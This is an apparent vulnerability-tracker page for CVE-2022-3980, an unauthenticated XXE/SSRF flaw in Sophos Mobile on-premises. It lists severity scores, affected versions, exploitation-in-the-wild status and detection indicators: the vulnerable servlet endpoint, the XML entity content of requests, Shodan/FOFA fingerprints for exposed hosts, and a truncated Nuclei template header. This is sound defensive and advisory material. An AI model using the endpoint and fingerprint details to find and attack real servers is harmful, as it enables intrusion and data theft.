CVE-2022-3980
published 2022-11-16CVE-2022-3980: An XML External Entity (XEE) vulnerability allows server-side request forgery (SSRF) and potential code execution in Sophos Mobile managed on-premises between…
PriorityP183critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
8.09%
94.1th percentile
An XML External Entity (XEE) vulnerability allows server-side request forgery (SSRF) and potential code execution in Sophos Mobile managed on-premises between versions 5.0.0 and 9.7.4.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sophos | mobile | >= 5.0.0 < 9.7.5 | 9.7.5 |
| sophos | sophos_mobile_managed_on-premises | >= 5.0.0 < unspecified | unspecified |
| sophos | sophos_mobile_managed_on-premises | unspecified – 9.7.4 | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Exploit targets the OMA-DS servlet endpoint via HTTP POST with XML payload containing an XXE declaration. Monitor for POST requests to /servlets/OmaDsServlet with Content-Type application/xml containing DOCTYPE or ENTITY declarations. ↗
- →Successful XXE exploitation may result in an HTTP 400 response with an empty body (len(body) == 0). Correlate 400 responses with zero-length bodies on this endpoint as a post-exploitation indicator. ↗
- →Identify exposed Sophos Mobile on-premises instances via Shodan favicon hash -1274798165 or title 'sophos mobile', and FOFA icon_hash=-1274798165 or title='Sophos Mobile'. ↗
- →Out-of-band (OOB) detection: monitor for unexpected outbound HTTP or DNS callbacks triggered from the Sophos Mobile server, which indicate successful XXE/SSRF exploitation. ↗
- ·Vulnerability affects Sophos Mobile managed on-premises versions 5.0.0 through 9.7.4 only; cloud-hosted deployments are not affected. ↗
- ·The exploit requires no authentication (PR:N, UI:N per CVSS), meaning the /servlets/OmaDsServlet endpoint is reachable without credentials and should be restricted at the network perimeter if patching is not immediately possible. ↗
- ·The nuclei template uses a 50-second timeout for the exploit request, suggesting the XXE/SSRF callback may be slow or delayed; detection rules should account for delayed OOB responses. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-965x-72v5-49v5: An XML External Entity (XEE) vulnerability allows server-side request forgery (SSRF) and potential code execution in Sophos Mobile managed on-premises
ghsa_unreviewed·2022-11-16
CVE-2022-3980 [CRITICAL] CWE-611 GHSA-965x-72v5-49v5: An XML External Entity (XEE) vulnerability allows server-side request forgery (SSRF) and potential code execution in Sophos Mobile managed on-premises
An XML External Entity (XEE) vulnerability allows server-side request forgery (SSRF) and potential code execution in Sophos Mobile managed on-premises between versions 5.0.0 and 9.7.4.
VulnCheck
Sophos mobile Improper Restriction of XML External Entity Reference
vulncheck·2022·CVSS 9.8
CVE-2022-3980 [CRITICAL] Sophos mobile Improper Restriction of XML External Entity Reference
Sophos mobile Improper Restriction of XML External Entity Reference
An XML External Entity (XEE) vulnerability allows server-side request forgery (SSRF) and potential code execution in Sophos Mobile managed on-premises between versions 5.0.0 and 9.7.4.
Affected: Sophos mobile
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-13&host_type=src&vulnerability=cve-2022-3980; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-12-25&host_type=src&vulnerability=cve-2022-3980; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?
No detection rules found.
Nuclei
Sophos Mobile managed on-premises - XML External Entity Injection
nuclei·CVSS 9.8
CVE-2022-3980 [CRITICAL] Sophos Mobile managed on-premises - XML External Entity Injection
Sophos Mobile managed on-premises - XML External Entity Injection
An XML External Entity (XXE) vulnerability allows server-side request forgery (SSRF) and potential code execution in Sophos Mobile managed on-premises between versions 5.0.0 and 9.7.4.
Template:
id: CVE-2022-3980
info:
name: Sophos Mobile managed on-premises - XML External Entity Injection
author: dabla
severity: critical
description: |
An XML External Entity (XXE) vulnerability allows server-side request forgery (SSRF) and potential code execution in Sophos Mobile managed on-premises between versions 5.0.0 and 9.7.4.
impact: |
Successful exploitation of this vulnerability could allow an attacker to read arbitrary files on the server or conduct server-side request forgery (SSRF) attacks.
remediation: |
Apply the latest s
No writeups or analysis indexed.
2022-11-16
Published
Exploited in the wild